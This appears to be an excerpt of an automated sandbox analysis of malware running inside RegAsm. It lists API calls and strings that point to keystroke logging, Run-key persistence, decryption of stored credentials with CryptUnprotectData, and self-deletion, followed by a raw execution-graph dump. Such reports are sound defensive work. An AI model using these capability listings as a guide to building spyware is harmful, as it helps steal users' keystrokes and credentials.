                          • API String ID: 1174141254-1629609700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free
                          • String ID: X8|
                          • API String ID: 269201875-3552716790
                          APIs
                          • GetKeyState.USER32(00000011), ref: 0040B686
                            • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
                            • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                            • Part of subcall function 0040A41B: GetKeyboardLayout.USER32 ref: 0040A464
                            • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                            • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
                            • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A49C
                            • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A4FC
                            • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                          • String ID: [AltL]$[AltR]
                          • API String ID: 2738857842-2658077756
                          APIs
                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExecuteShell
                          • String ID: !D@$open
                          • API String ID: 587946157-1586967515
                          APIs
                          • GetKeyState.USER32(00000012), ref: 0040B6E0
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: State
                          • String ID: [CtrlL]$[CtrlR]
                          • API String ID: 1649606143-2446555240
                          APIs
                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                          • __Init_thread_footer.LIBCMT ref: 00410F64
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Init_thread_footer__onexit
                          • String ID: ,kG$0kG
                          • API String ID: 1881088180-2015055088
                          APIs
                          Strings
                          • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: DeleteOpenValue
                          • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                          • API String ID: 2654517830-1051519024
                          APIs
                          • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                          • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: DeleteDirectoryFileRemove
                          • String ID: pth_unenc
                          • API String ID: 3325800564-4028850238
                          APIs
                          • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                          • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ObjectProcessSingleTerminateWait
                          • String ID: pth_unenc
                          • API String ID: 1872346434-4028850238
                          APIs
                          • GetLastInputInfo.USER32(NG), ref: 0041BB87
                          • GetTickCount.KERNEL32(?,?,?,00415BDE), ref: 0041BB8D
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CountInfoInputLastTick
                          • String ID: NG
                          • API String ID: 3478931382-1651712548
                          APIs
                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                          • GetLastError.KERNEL32 ref: 00440D85
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWide$ErrorLast
                          • String ID:
                          • API String ID: 1717984340-0
                          APIs
                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                          • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
                          • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastRead
                          • String ID:
                          • API String ID: 4100373531-0

                          Execution Graph

                          Execution Coverage: 5.4%
                          Dynamic/Decrypted Code Coverage: 9.2%
                          Signature Coverage: 0%
                          Total number of Nodes: 1990
                          Total number of Limit Nodes: 56
38873->38869 38911 40e175 38873->38911 38876 40e5c4 CloseHandle 38874->38876 38877 40e5cc 38874->38877 38876->38877 38879 40b633 free 38877->38879 38878 40e573 38880 40e584 38878->38880 38881 40e57c CloseHandle 38878->38881 38882 40e5db 38879->38882 38932 40b1ab free free 38880->38932 38881->38880 38883 40b633 free 38882->38883 38885 40e5e3 38883->38885 38885->38862 38887 40e540 38887->38878 38931 40e2ab 30 API calls 38887->38931 38889 406214 22 API calls 38888->38889 38890 40e03c 38889->38890 38891 40e16b 38890->38891 38892 40dd85 60 API calls 38890->38892 38891->38873 38893 40e06b 38892->38893 38893->38891 38894 40afcf ??2@YAPAXI ??3@YAXPAX 38893->38894 38895 40e08d OpenProcess 38894->38895 38896 40e0a4 GetCurrentProcess DuplicateHandle 38895->38896 38900 40e152 38895->38900 38897 40e0d0 GetFileSize 38896->38897 38898 40e14a CloseHandle 38896->38898 38901 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38897->38901 38898->38900 38899 40e160 38903 40b04b ??3@YAXPAX 38899->38903 38900->38899 38902 406214 22 API calls 38900->38902 38904 40e0ea 38901->38904 38902->38899 38903->38891 38905 4096dc CreateFileW 38904->38905 38906 40e0f1 CreateFileMappingW 38905->38906 38907 40e140 CloseHandle CloseHandle 38906->38907 38908 40e10b MapViewOfFile 38906->38908 38907->38898 38909 40e13b CloseHandle 38908->38909 38910 40e11f WriteFile UnmapViewOfFile 38908->38910 38909->38907 38910->38909 38912 40e18c 38911->38912 38913 406b90 11 API calls 38912->38913 38914 40e19f 38913->38914 38915 40e1a7 memset 38914->38915 38916 40e299 38914->38916 38921 40e1e8 38915->38921 38917 4069a3 ??3@YAXPAX free 38916->38917 38918 40e2a4 38917->38918 38918->38887 38919 406e8f 13 API calls 38919->38921 38920 406b53 SetFilePointerEx ReadFile 38920->38921 38921->38919 38921->38920 38922 40dd50 _wcsicmp 38921->38922 38923 40e283 38921->38923 38927 40742e 8 API calls 38921->38927 38928 40aae3 wcslen wcslen _memicmp 38921->38928 38929 40e244 _snwprintf 38921->38929 38922->38921 38924 40e291 
38923->38924 38925 40e288 free 38923->38925 38926 40aa04 free 38924->38926 38925->38924 38926->38916 38927->38921 38928->38921 38930 40a8d0 7 API calls 38929->38930 38930->38921 38931->38887 38932->38869 38935 40a980 38933->38935 38934 40a8bb 38934->38808 38934->38809 38935->38934 38936 40a995 _wcsicmp 38935->38936 38937 40a99c wcscmp 38935->38937 38936->38935 38937->38935 38938->38812 38939->38816 38941 40aa23 RegEnumValueW 38940->38941 38941->38823 38941->38824 38943 40522a 38942->38943 38968 405329 38942->38968 38944 40b2cc 27 API calls 38943->38944 38945 405234 38944->38945 38946 40a804 8 API calls 38945->38946 38947 40523a 38946->38947 38969 40b273 38947->38969 38949 405248 _mbscpy _mbscat 38950 40526c 38949->38950 38951 40b273 27 API calls 38950->38951 38952 405279 38951->38952 38953 40b273 27 API calls 38952->38953 38954 40528f 38953->38954 38955 40b273 27 API calls 38954->38955 38956 4052a5 38955->38956 38957 40b273 27 API calls 38956->38957 38958 4052bb 38957->38958 38959 40b273 27 API calls 38958->38959 38960 4052d1 38959->38960 38961 40b273 27 API calls 38960->38961 38962 4052e7 38961->38962 38963 40b273 27 API calls 38962->38963 38964 4052fd 38963->38964 38965 40b273 27 API calls 38964->38965 38966 405313 38965->38966 38967 40b273 27 API calls 38966->38967 38967->38968 38968->38834 38970 40b58d 27 API calls 38969->38970 38971 40b18c 38970->38971 38971->38949 38973 40440c FreeLibrary 38972->38973 38974 40436d 38973->38974 38975 40a804 8 API calls 38974->38975 38976 404377 38975->38976 38977 4043f7 38976->38977 38978 40b273 27 API calls 38976->38978 38977->38416 38977->38418 38979 40438d 38978->38979 38980 40b273 27 API calls 38979->38980 38981 4043a7 38980->38981 38982 40b273 27 API calls 38981->38982 38983 4043ba 38982->38983 38984 40b273 27 API calls 38983->38984 38985 4043ce 38984->38985 38986 40b273 27 API calls 38985->38986 38987 4043e2 38986->38987 38987->38977 38988 40440c FreeLibrary 38987->38988 38988->38977 38990 404413 FreeLibrary 38989->38990 
38991 40441e 38989->38991 38990->38991 38991->38429 38992->38426 38994 40447e 38993->38994 38995 40442e 38993->38995 38996 404485 CryptUnprotectData 38994->38996 38997 40449c 38994->38997 38998 40b2cc 27 API calls 38995->38998 38996->38997 38997->38426 38999 404438 38998->38999 39000 40a804 8 API calls 38999->39000 39001 40443e 39000->39001 39002 40444f 39001->39002 39003 40b273 27 API calls 39001->39003 39002->38994 39004 404475 FreeLibrary 39002->39004 39003->39002 39004->38994 39006 4135f6 39005->39006 39007 4135eb FreeLibrary 39005->39007 39006->38432 39007->39006 39009 4449c4 39008->39009 39027 444a48 39008->39027 39010 40b2cc 27 API calls 39009->39010 39011 4449cb 39010->39011 39012 40a804 8 API calls 39011->39012 39013 4449d1 39012->39013 39014 40b273 27 API calls 39013->39014 39015 4449dc 39014->39015 39016 40b273 27 API calls 39015->39016 39017 4449f3 39016->39017 39018 40b273 27 API calls 39017->39018 39019 444a04 39018->39019 39020 40b273 27 API calls 39019->39020 39021 444a15 39020->39021 39022 40b273 27 API calls 39021->39022 39023 444a26 39022->39023 39024 40b273 27 API calls 39023->39024 39025 444a37 39024->39025 39026 40b273 27 API calls 39025->39026 39026->39027 39027->38452 39027->38453 39028->38462 39029->38462 39030->38462 39031->38462 39032->38454 39034 403a29 39033->39034 39048 403bed memset memset 39034->39048 39036 403ae7 39061 40b1ab free free 39036->39061 39037 403a3f memset 39041 403a2f 39037->39041 39039 403aef 39039->38471 39040 409d1f 6 API calls 39040->39041 39041->39036 39041->39037 39041->39040 39042 409b98 GetFileAttributesW 39041->39042 39043 40a8d0 7 API calls 39041->39043 39042->39041 39043->39041 39045 40a051 GetFileTime CloseHandle 39044->39045 39046 4039ca CompareFileTime 39044->39046 39045->39046 39046->38471 39047->38470 39049 414c2e 16 API calls 39048->39049 39050 403c38 39049->39050 39051 409719 2 API calls 39050->39051 39052 403c3f wcscat 39051->39052 39053 414c2e 16 API calls 39052->39053 39054 403c61 39053->39054 39055 
409719 2 API calls 39054->39055 39056 403c68 wcscat 39055->39056 39062 403af5 39056->39062 39059 403af5 20 API calls 39060 403c95 39059->39060 39060->39041 39061->39039 39063 403b02 39062->39063 39064 40ae18 9 API calls 39063->39064 39073 403b37 39064->39073 39065 403bdb 39067 40aebe FindClose 39065->39067 39066 40add4 wcscmp wcscmp 39066->39073 39068 403be6 39067->39068 39068->39059 39069 40a8d0 7 API calls 39069->39073 39070 40ae18 9 API calls 39070->39073 39071 40ae51 9 API calls 39071->39073 39072 40aebe FindClose 39072->39073 39073->39065 39073->39066 39073->39069 39073->39070 39073->39071 39073->39072 39075 409d1f 6 API calls 39074->39075 39076 404190 39075->39076 39089 409b98 GetFileAttributesW 39076->39089 39078 40419c 39079 4041a7 6 API calls 39078->39079 39080 40435c 39078->39080 39081 40424f 39079->39081 39080->38492 39081->39080 39083 40425e memset 39081->39083 39085 409d1f 6 API calls 39081->39085 39086 40a8ab 9 API calls 39081->39086 39090 414842 39081->39090 39083->39081 39084 404296 wcscpy 39083->39084 39084->39081 39085->39081 39087 4042b6 memset memset _snwprintf wcscpy 39086->39087 39087->39081 39088->38496 39089->39078 39093 41443e 39090->39093 39092 414866 39092->39081 39094 41444b 39093->39094 39095 414451 39094->39095 39096 4144a3 GetPrivateProfileStringW 39094->39096 39097 414491 39095->39097 39098 414455 wcschr 39095->39098 39096->39092 39100 414495 WritePrivateProfileStringW 39097->39100 39098->39097 39099 414463 _snwprintf 39098->39099 39099->39100 39100->39092 39101->38501 39103 40b2cc 27 API calls 39102->39103 39104 409615 39103->39104 39105 409d1f 6 API calls 39104->39105 39106 409625 39105->39106 39129 409b98 GetFileAttributesW 39106->39129 39108 409634 39109 409648 39108->39109 39146 4091b8 238 API calls 39108->39146 39111 40b2cc 27 API calls 39109->39111 39113 408801 39109->39113 39112 40965d 39111->39112 39114 409d1f 6 API calls 39112->39114 39113->38504 39113->38536 39115 40966d 39114->39115 39130 409b98 GetFileAttributesW 
39115->39130 39117 40967c 39117->39113 39131 409529 39117->39131 39119->38526 39120->38536 39121->38531 39122->38536 39123->38537 39124->38538 39125->38542 39126->38544 39127->38547 39128->38536 39129->39108 39130->39117 39147 4096c3 CreateFileW 39131->39147 39133 409543 39134 4095cd 39133->39134 39135 409550 GetFileSize 39133->39135 39134->39113 39136 409577 CloseHandle 39135->39136 39137 40955f 39135->39137 39136->39134 39142 409585 39136->39142 39138 40afcf 2 API calls 39137->39138 39139 409569 39138->39139 39148 40a2ef ReadFile 39139->39148 39141 409574 39141->39136 39142->39134 39143 4095c3 39142->39143 39149 408b8d 38 API calls 39142->39149 39150 40908b 55 API calls 39143->39150 39146->39109 39147->39133 39148->39141 39149->39142 39150->39134 39178 413f4f 39151->39178 39154 413f37 K32GetModuleFileNameExW 39155 413f4a 39154->39155 39155->38565 39157 413969 wcscpy 39156->39157 39158 41396c wcschr 39156->39158 39170 413a3a 39157->39170 39158->39157 39160 41398e 39158->39160 39182 4097f7 wcslen wcslen _memicmp 39160->39182 39162 41399a 39163 4139a4 memset 39162->39163 39164 4139e6 39162->39164 39183 409dd5 GetWindowsDirectoryW wcscpy 39163->39183 39166 413a31 wcscpy 39164->39166 39167 4139ec memset 39164->39167 39166->39170 39184 409dd5 GetWindowsDirectoryW wcscpy 39167->39184 39168 4139c9 wcscpy wcscat 39168->39170 39170->38565 39171 413a11 memcpy wcscat 39171->39170 39173 413cb0 GetModuleHandleW 39172->39173 39174 413cda 39172->39174 39173->39174 39175 413cbf 39173->39175 39176 413ce3 GetProcessTimes 39174->39176 39177 413cf6 39174->39177 39175->39174 39176->38567 39177->38567 39179 413f54 39178->39179 39181 413f2f 39178->39181 39180 40a804 8 API calls 39179->39180 39180->39181 39181->39154 39181->39155 39182->39162 39183->39168 39184->39171 39185->38587 39186->38610 39188 409cf9 GetVersionExW 39187->39188 39189 409d0a 39187->39189 39188->39189 39189->38617 39189->38621 39190->38624 39191->38627 39192->38629 39193->38674 39195 40bba5 39194->39195 39310 40cc26 
39195->39310 39198 40bd4b 39331 40cc0c 39198->39331 39203 40b2cc 27 API calls 39204 40bbef 39203->39204 39338 40ccf0 _wcsicmp 39204->39338 39206 40bbf5 39206->39198 39339 40ccb4 6 API calls 39206->39339 39208 40bc26 39209 40cf04 17 API calls 39208->39209 39210 40bc2e 39209->39210 39211 40bd43 39210->39211 39212 40b2cc 27 API calls 39210->39212 39213 40cc0c 4 API calls 39211->39213 39214 40bc40 39212->39214 39213->39198 39340 40ccf0 _wcsicmp 39214->39340 39216 40bc46 39216->39211 39217 40bc61 memset memset WideCharToMultiByte 39216->39217 39341 40103c strlen 39217->39341 39219 40bcc0 39220 40b273 27 API calls 39219->39220 39221 40bcd0 memcmp 39220->39221 39221->39211 39222 40bce2 39221->39222 39223 404423 37 API calls 39222->39223 39224 40bd10 39223->39224 39224->39211 39225 40bd3a LocalFree 39224->39225 39226 40bd1f memcpy 39224->39226 39225->39211 39226->39225 39227->38689 39401 4438b5 39228->39401 39230 44444c 39231 40b879 39230->39231 39415 415a6d 39230->39415 39231->38692 39231->38693 39234 444486 39236 4444b9 memcpy 39234->39236 39273 4444a4 39234->39273 39235 44469e 39235->39231 39466 443d90 110 API calls 39235->39466 39419 415258 39236->39419 39239 444524 39240 444541 39239->39240 39241 44452a 39239->39241 39422 444316 39240->39422 39456 416935 16 API calls 39241->39456 39245 444316 18 API calls 39246 444563 39245->39246 39247 444316 18 API calls 39246->39247 39248 44456f 39247->39248 39249 444316 18 API calls 39248->39249 39250 44457f 39249->39250 39250->39273 39436 432d4e 39250->39436 39253 444316 18 API calls 39254 4445b0 39253->39254 39440 41eed2 39254->39440 39256 4445cf 39257 4445d6 39256->39257 39258 4445ee 39256->39258 39457 416935 16 API calls 39257->39457 39458 43302c memset 39258->39458 39260 4445fa 39459 43302c memset 39260->39459 39263 444609 39263->39273 39460 416935 16 API calls 39263->39460 39265 444646 39461 434d4b 17 API calls 39265->39461 39267 44464d 39462 437655 16 API calls 39267->39462 39269 444653 39463 4442e6 11 API calls 
39269->39463 39271 44465d 39271->39273 39464 416935 16 API calls 39271->39464 39465 4442e6 11 API calls 39273->39465 39504 438460 39274->39504 39276 40b8a4 39276->38699 39280 4251c4 39276->39280 39278 409a74 GetTempFileNameW 39277->39278 39279 409a66 GetWindowsDirectoryW 39277->39279 39278->38686 39279->39278 39601 424f07 11 API calls 39280->39601 39282 4251e4 39283 4251f7 39282->39283 39284 4251e8 39282->39284 39603 4250f8 39283->39603 39602 4446ea 11 API calls 39284->39602 39286 4251f2 39286->38724 39288 425209 39291 425249 39288->39291 39294 4250f8 126 API calls 39288->39294 39295 425287 39288->39295 39611 4384e9 134 API calls 39288->39611 39612 424f74 123 API calls 39288->39612 39291->39295 39613 424ff0 13 API calls 39291->39613 39294->39288 39615 415c7d 16 API calls 39295->39615 39296 425266 39296->39295 39614 415be9 memcpy 39296->39614 39298->38724 39299->38724 39300->38724 39301->38724 39302->38724 39303->38724 39304->38724 39305->38724 39306->38724 39307->38699 39308->38692 39309->38721 39342 4096c3 CreateFileW 39310->39342 39312 40cc34 39313 40cc3d GetFileSize 39312->39313 39314 40bbca 39312->39314 39315 40afcf 2 API calls 39313->39315 39314->39198 39322 40cf04 39314->39322 39316 40cc64 39315->39316 39343 40a2ef ReadFile 39316->39343 39318 40cc71 39344 40ab4a MultiByteToWideChar 39318->39344 39320 40cc95 CloseHandle 39321 40b04b ??3@YAXPAX 39320->39321 39321->39314 39323 40b633 free 39322->39323 39324 40cf14 39323->39324 39350 40b1ab free free 39324->39350 39326 40bbdd 39326->39198 39326->39203 39327 40cf1b 39327->39326 39329 40cfef 39327->39329 39351 40cd4b 39327->39351 39330 40cd4b 14 API calls 39329->39330 39330->39326 39332 40b633 free 39331->39332 39333 40cc15 39332->39333 39334 40aa04 free 39333->39334 39335 40cc1d 39334->39335 39400 40b1ab free free 39335->39400 39337 40b7d4 memset CreateFileW 39337->38679 39337->38680 39338->39206 39339->39208 39340->39216 39341->39219 39342->39312 39343->39318 39345 40ab6b 39344->39345 39349 40ab93 39344->39349 
39346 40a9ce 4 API calls 39345->39346 39347 40ab74 39346->39347 39348 40ab7c MultiByteToWideChar 39347->39348 39348->39349 39349->39320 39350->39327 39352 40cd7b 39351->39352 39385 40aa29 39352->39385 39354 40cef5 39355 40aa04 free 39354->39355 39356 40cefd 39355->39356 39356->39327 39358 40aa29 6 API calls 39359 40ce1d 39358->39359 39360 40aa29 6 API calls 39359->39360 39361 40ce3e 39360->39361 39362 40ce6a 39361->39362 39393 40abb7 wcslen memmove 39361->39393 39363 40ce9f 39362->39363 39396 40abb7 wcslen memmove 39362->39396 39366 40a8d0 7 API calls 39363->39366 39369 40ceb5 39366->39369 39367 40ce56 39394 40aa71 wcslen 39367->39394 39368 40ce8b 39397 40aa71 wcslen 39368->39397 39375 40a8d0 7 API calls 39369->39375 39372 40ce5e 39395 40abb7 wcslen memmove 39372->39395 39373 40ce93 39398 40abb7 wcslen memmove 39373->39398 39377 40cecb 39375->39377 39399 40d00b malloc memcpy free free 39377->39399 39379 40cedd 39380 40aa04 free 39379->39380 39381 40cee5 39380->39381 39382 40aa04 free 39381->39382 39383 40ceed 39382->39383 39384 40aa04 free 39383->39384 39384->39354 39386 40aa33 39385->39386 39392 40aa63 39385->39392 39387 40aa44 39386->39387 39388 40aa38 wcslen 39386->39388 39389 40a9ce malloc memcpy free free 39387->39389 39388->39387 39390 40aa4d 39389->39390 39391 40aa51 memcpy 39390->39391 39390->39392 39391->39392 39392->39354 39392->39358 39393->39367 39394->39372 39395->39362 39396->39368 39397->39373 39398->39363 39399->39379 39400->39337 39402 4438d0 39401->39402 39412 4438c9 39401->39412 39467 415378 memcpy memcpy 39402->39467 39412->39230 39416 415a77 39415->39416 39417 415a8d 39416->39417 39418 415a7e memset 39416->39418 39417->39234 39418->39417 39420 4438b5 11 API calls 39419->39420 39421 41525d 39420->39421 39421->39239 39423 444328 39422->39423 39424 444423 39423->39424 39425 44434e 39423->39425 39470 4446ea 11 API calls 39424->39470 39426 432d4e 3 API calls 39425->39426 39428 44435a 39426->39428 39430 444375 39428->39430 39435 44438b 39428->39435 
39429 432d4e 3 API calls 39431 4443ec 39429->39431 39468 416935 16 API calls 39430->39468 39433 444381 39431->39433 39469 416935 16 API calls 39431->39469 39433->39245 39435->39429 39437 432d58 39436->39437 39439 432d65 39436->39439 39471 432cc4 memset memset memcpy 39437->39471 39439->39253 39441 41eee2 39440->39441 39442 415a6d memset 39441->39442 39443 41ef23 39442->39443 39444 415a6d memset 39443->39444 39455 41ef2d 39443->39455 39445 41ef42 39444->39445 39449 41ef49 39445->39449 39472 41b7d9 39445->39472 39447 41ef66 39448 41ef74 memset 39447->39448 39447->39449 39450 41ef91 39448->39450 39453 41ef9e 39448->39453 39449->39455 39490 41b321 100 API calls 39449->39490 39486 41519d 39450->39486 39453->39449 39489 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39453->39489 39455->39256 39456->39273 39457->39273 39458->39260 39459->39263 39460->39265 39461->39267 39462->39269 39463->39271 39464->39273 39465->39235 39466->39231 39468->39433 39469->39433 39470->39433 39471->39439 39478 41b812 39472->39478 39473 415a6d memset 39474 41b8c2 39473->39474 39475 41b980 39474->39475 39476 41b902 memcpy memcpy memcpy memcpy memcpy 39474->39476 39481 41b849 39474->39481 39483 41b9ad 39475->39483 39492 4151e3 39475->39492 39476->39475 39478->39481 39485 41b884 39478->39485 39491 444706 11 API calls 39478->39491 39480 41ba12 39480->39481 39482 41ba32 memset 39480->39482 39481->39447 39482->39481 39483->39481 39495 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39483->39495 39485->39473 39485->39481 39496 4175ed 39486->39496 39489->39449 39490->39455 39491->39485 39494 41837f 54 API calls 39492->39494 39493 4151f9 39493->39483 39494->39493 39495->39480 39497 417570 SetFilePointer GetLastError GetLastError 39496->39497 39498 4175ff 39497->39498 39499 41760a ReadFile 39498->39499 39500 4151b3 39498->39500 39501 417637 39499->39501 39502 417627 GetLastError 39499->39502 39500->39453 39501->39500 39503 41763e memset 39501->39503 39502->39500 39503->39500 39516 
41703f 39504->39516 39506 43847a 39507 43848a 39506->39507 39508 43847e 39506->39508 39523 438270 39507->39523 39553 4446ea 11 API calls 39508->39553 39513 4384bb 39514 438270 133 API calls 39513->39514 39515 438488 39514->39515 39515->39276 39517 417044 39516->39517 39518 41705c 39516->39518 39522 417055 39517->39522 39555 416760 11 API calls 39517->39555 39519 417075 39518->39519 39556 41707a 11 API calls 39518->39556 39519->39506 39522->39506 39557 415a91 39523->39557 39525 43828d 39526 438297 39525->39526 39527 438341 39525->39527 39529 4382d6 39525->39529 39600 415c7d 16 API calls 39526->39600 39561 44358f 39527->39561 39532 4382fb 39529->39532 39533 4382db 39529->39533 39531 438458 39531->39515 39554 424f26 122 API calls 39531->39554 39594 415c23 memcpy 39532->39594 39592 416935 16 API calls 39533->39592 39536 4382e9 39593 415c7d 16 API calls 39536->39593 39537 438305 39540 44358f 19 API calls 39537->39540 39542 438318 39537->39542 39539 438373 39546 438383 39539->39546 39595 4300e8 memset memset memcpy 39539->39595 39540->39542 39542->39539 39587 43819e 39542->39587 39544 4383f5 39549 438404 39544->39549 39550 43841c 39544->39550 39545 4383cd 39545->39544 39597 42453e 122 API calls 39545->39597 39546->39545 39596 415c23 memcpy 39546->39596 39598 416935 16 API calls 39549->39598 39599 416935 16 API calls 39550->39599 39553->39515 39554->39513 39555->39522 39556->39517 39558 415a9d 39557->39558 39559 415ab3 39558->39559 39560 415aa4 memset 39558->39560 39559->39525 39560->39559 39562 4435be 39561->39562 39563 443676 39562->39563 39566 4436ce 39562->39566 39569 442ff8 19 API calls 39562->39569 39571 44366c 39562->39571 39585 44360c 39562->39585 39564 443737 39563->39564 39567 442ff8 19 API calls 39563->39567 39570 443758 39563->39570 39568 442ff8 19 API calls 39564->39568 39565 441409 memset 39565->39570 39573 4165ff 11 API calls 39566->39573 39567->39564 39568->39570 39569->39562 39570->39565 39575 443775 39570->39575 39574 4169a7 11 API calls 39571->39574 
